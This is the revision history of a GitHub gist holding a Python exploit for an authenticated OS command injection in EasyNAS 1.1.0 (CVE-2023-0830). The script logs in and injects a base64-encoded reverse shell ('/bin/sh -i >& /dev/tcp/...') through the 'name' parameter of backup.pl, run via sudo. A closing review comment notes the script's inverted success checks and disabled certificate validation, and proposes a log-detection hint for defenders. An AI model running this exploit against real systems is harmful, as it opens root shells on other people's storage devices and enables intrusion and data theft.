xbz0n revised this gist
Feb 15, 2023 . 1 changed file with 1 addition and 1 deletion.
@@ -2,7 +2,7 @@ # Date: 2023-02-9 # Exploit Author: Ivan Spiridonov (ivanspiridonov@gmail.com) # Author Blog: https://xbz0n.medium.com # Version: 1.1.0 # Vendor home page : https://www.easynas.org # Authentication Required: Yes # CVE : CVE-2023-0830 -
xbz0n renamed this gist
Feb 14, 2023 . 1 changed file with 1 addition and 1 deletion.
@@ -1,4 +1,4 @@ # Exploit Title: EasyNAS 1.1.0 - Authenticated OS Command Injection Exploit # Date: 2023-02-9 # Exploit Author: Ivan Spiridonov (ivanspiridonov@gmail.com) # Author Blog: https://xbz0n.medium.com -
xbz0n renamed this gist
Feb 14, 2023 . 1 changed file with 2 additions and 2 deletions.
@@ -1,11 +1,11 @@ # Exploit Title: EasyNas 1.1.0 - OS Command Injection # Date: 2023-02-9 # Exploit Author: Ivan Spiridonov (ivanspiridonov@gmail.com) # Author Blog: https://xbz0n.medium.com # Version: 1.0.0 # Vendor home page : https://www.easynas.org # Authentication Required: Yes # CVE : CVE-2023-0830 #!/usr/bin/python3 -
xbz0n renamed this gist
Feb 9, 2023 . 1 changed file with 0 additions and 0 deletions.
File renamed without changes. -
xbz0n created this gist
Feb 9, 2023 .
@@ -0,0 +1,74 @@ # Exploit Title: EasyNas 1.0.0 - OS Command Injection # Date: 2023-02-9 # Exploit Author: Ivan Spiridonov (ivanspiridonov@gmail.com) # Author Blog: https://xbz0n.medium.com # Version: 1.0.0 # Vendor home page : https://www.easynas.org # Authentication Required: Yes # CVE : CVE-X #!/usr/bin/python3 import requests import sys import base64 import urllib.parse import time from requests.packages.urllib3.exceptions import InsecureRequestWarning # Disable the insecure request warning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) if len(sys.argv) < 6: print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort") sys.exit() url = sys.argv[1] user = sys.argv[2] password = sys.argv[3] # Create the payload payload = "/bin/sh -i >& /dev/tcp/{}/{} 0>&1".format(sys.argv[4], sys.argv[5]) # Encode the payload in base64 payload = base64.b64encode(payload.encode()).decode() # URL encode the payload payload = urllib.parse.quote(payload) # Create the login data login_data = { 'usr':user, 'pwd':password, 'action':'login' } # Create a session session = requests.Session() # Send the login request print("Sending login request...") login_response = session.post(f"https://{url}/easynas/login.pl", data=login_data, verify=False) # Check if the login was successful if 'Login to EasyNAS' in login_response.text: print("Unsuccessful login") sys.exit() else: print("Login successful") # send the exploit request timeout = 3 try: exploit_response = session.get(f'https://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23', headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, timeout = timeout, verify=False) if exploit_response.status_code != 200: print("[+] Everything seems ok, check your listener.") else: print("[-] Exploit failed, system is patched or credentials are wrong.") except requests.exceptions.ReadTimeout: print("[-] Everything seems ok, check 
your listener.") sys.exit()
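Review bot: The outcome check at the end of the script cannot serve as evidence of patch status: any status other than 200 is printed as `[+] Everything seems ok`, a 200 is printed as failure, and the `ReadTimeout` branch prints the same "seems ok" text under a `[-]` prefix, so a patched host that answers with an error status would presumably be reported as vulnerable. Both requests pass `verify=False` and the warning is disabled globally, so the credentials in `login_data` are posted without certificate validation; the login `session.post` also has no `timeout`. For defenders, the header comment should name the injection point that the request makes visible, e.g. `# Injection point: 'name' parameter of /easynas/backup.pl; review web logs for '|' (%7c) or 'base64 -d' in that parameter`.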